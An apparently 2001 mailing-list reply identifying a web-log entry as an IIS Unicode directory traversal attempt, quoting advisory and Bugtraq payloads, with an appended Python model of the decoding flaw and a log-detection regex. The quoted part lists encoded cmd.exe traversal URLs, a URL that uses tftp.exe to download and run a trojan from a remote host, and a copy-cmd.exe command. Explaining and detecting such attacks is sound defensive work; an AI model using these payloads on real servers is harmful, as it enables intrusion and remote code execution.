Wes,
 
This looks very much like someone attempting to use the so-called 'double dot com' exploit (or the Microsoft IIS and PWS Extended Unicode Directory Traversal Vulnerability) in IIS to get a shell from which to hack a system. There is more information below from SecurityFocus:
 
http://target/scripts/..%c1%1c../path/file.ext

Eg.

http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir

http://target/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir

Zoa_Chien <[EMAIL PROTECTED]> describes the following exploits using TFTP or Samba in his post to Bugtraq:

By using tftp.exe that comes with NT and win2k by connecting and
downloading a trojan from a tftp daemon you can bypass these
restrictions. Install < ftp://ftp.cavebear.com/karl/tftpd32.zip >
and connect from your compromised to your local machine using the
command " tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe ".
You can do so with this URL:
/[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"-i"+xxx.xxx.xxx.xxx+GET+ncx99.exe+c:\winnt\system32\ncx99.exe
then all you have to do is run the trojan with:
/[bin-dir]/..%c0%af../winnt/system32/ncx99.exe

You might also use the samba commands: "net share and net user"
on the target and "net use" on the local machine... but this does
not always seem to work. (coz. netbios is not installed?)

In their post to Bugtraq, Nsfocus Security Team <[EMAIL PROTECTED]> describes how to execute commands using a redirect on the target host:

(1) copy "..\..\winnt\system32\cmd.exe" to "..\..\interpub\scripts\cmd1.exe"

http://site/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+copy+..\..\winnt\system32\cmd.exe+cmd1.exe

IIS returned:

"CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers.
The headers it did return are:


1 file(s) copied."
 
 
 
----- Original Message -----
From: "Wes Stewart" <[EMAIL PROTECTED]>
Sent: Friday, August 31, 2001 11:36 PM
Subject: Off Topic Code Red Question

> GNAT Box User Forum http://www.gnatbox.com/cgi-bin/Ultimate.cgi
> Send postings to: [EMAIL PROTECTED]
> Access the list archives at: http://www.gnatbox.com/gb-users/
> -------------------------------------------------------------
> Had the following line and more like it in my web server's error log
>
> [Fri Aug 31 08:58:06 2001] [error] [client 204.142.159.200] File does not
> exist:
> /usr/local/etc/httpd/htdocs/iisadmpwd/..��../..��../..��../winnt/system32/cmd.exe
>
> Anyone know if this is Code Red trying to run, or is it someone else trying
> to cause havoc?  The web server is Apache running on Solaris so I know they
> aren't going to get anywhere with this tact.
>
>
>
> Wes Stewart
> IT Manager
> Cruise America
>
>
Best Regards,
 

Steve Leach
Network Manager
Miami International Limited
Eaglescliffe Logistics Centre
Durham Lane
Egglescliffe
URL: http://www.askalix.com
TEL: 01642 356205
e-mail: [EMAIL PROTECTED]
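An added illustration of why the encoded requests above slipped past IIS, written for this thread rather than taken from Steve's reply, the SecurityFocus advisory or the Bugtraq posts. It assumes a permissive UTF-8 decoder (the permissive_utf8 function is a model, not Microsoft's code) and shows that a traversal check run before multibyte decoding passes "..%c0%af..", while the same check on the fully decoded path blocks it; the overlong marker regex is the log-scanning signature.

```python
import re
from urllib.parse import unquote_to_bytes

# 0xC0/0xC1 can only start overlong 2-byte UTF-8 sequences, which a strict
# decoder must reject; ".." followed by one is the marker from the advisory.
OVERLONG_TRAVERSAL = re.compile(r"\.\.%c[01]%[0-9a-f]{2}", re.I)

def permissive_utf8(data: bytes) -> str:
    # Assumption: models a lenient decoder that maps a C0/C1 lead byte plus the
    # following byte to the 7-bit char it overlong-encodes (C0 AF -> '/').
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data):
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)

def escapes_root(path: str) -> bool:
    """Segment-wise normalisation: does the path climb above the web root?"""
    depth = 0
    for seg in re.split(r"[/\\]", path.split("?", 1)[0]):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False

def analyse(request_path: str) -> dict:
    """Run the traversal check before and after full (UTF-8) decoding."""
    percent_decoded = unquote_to_bytes(request_path)
    early_view = percent_decoded.decode("latin-1")   # multibyte still opaque
    canonical = permissive_utf8(percent_decoded)     # what the filesystem sees
    return {
        "early_check_blocks": escapes_root(early_view),
        "canonical_check_blocks": escapes_root(canonical),
        "overlong_marker": bool(OVERLONG_TRAVERSAL.search(request_path)),
    }

# Constructed sample request paths, not taken from anyone's logs.
SAMPLES = [
    "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%2f../winnt/system32/cmd.exe",
    "/images/a/../logo.png",
]
```

Running analyse() over SAMPLES shows the plain %2f form is caught by the early check while the %c0%af and %c1%9c forms are only caught once the path is canonicalised, which is the ordering bug the advisory describes.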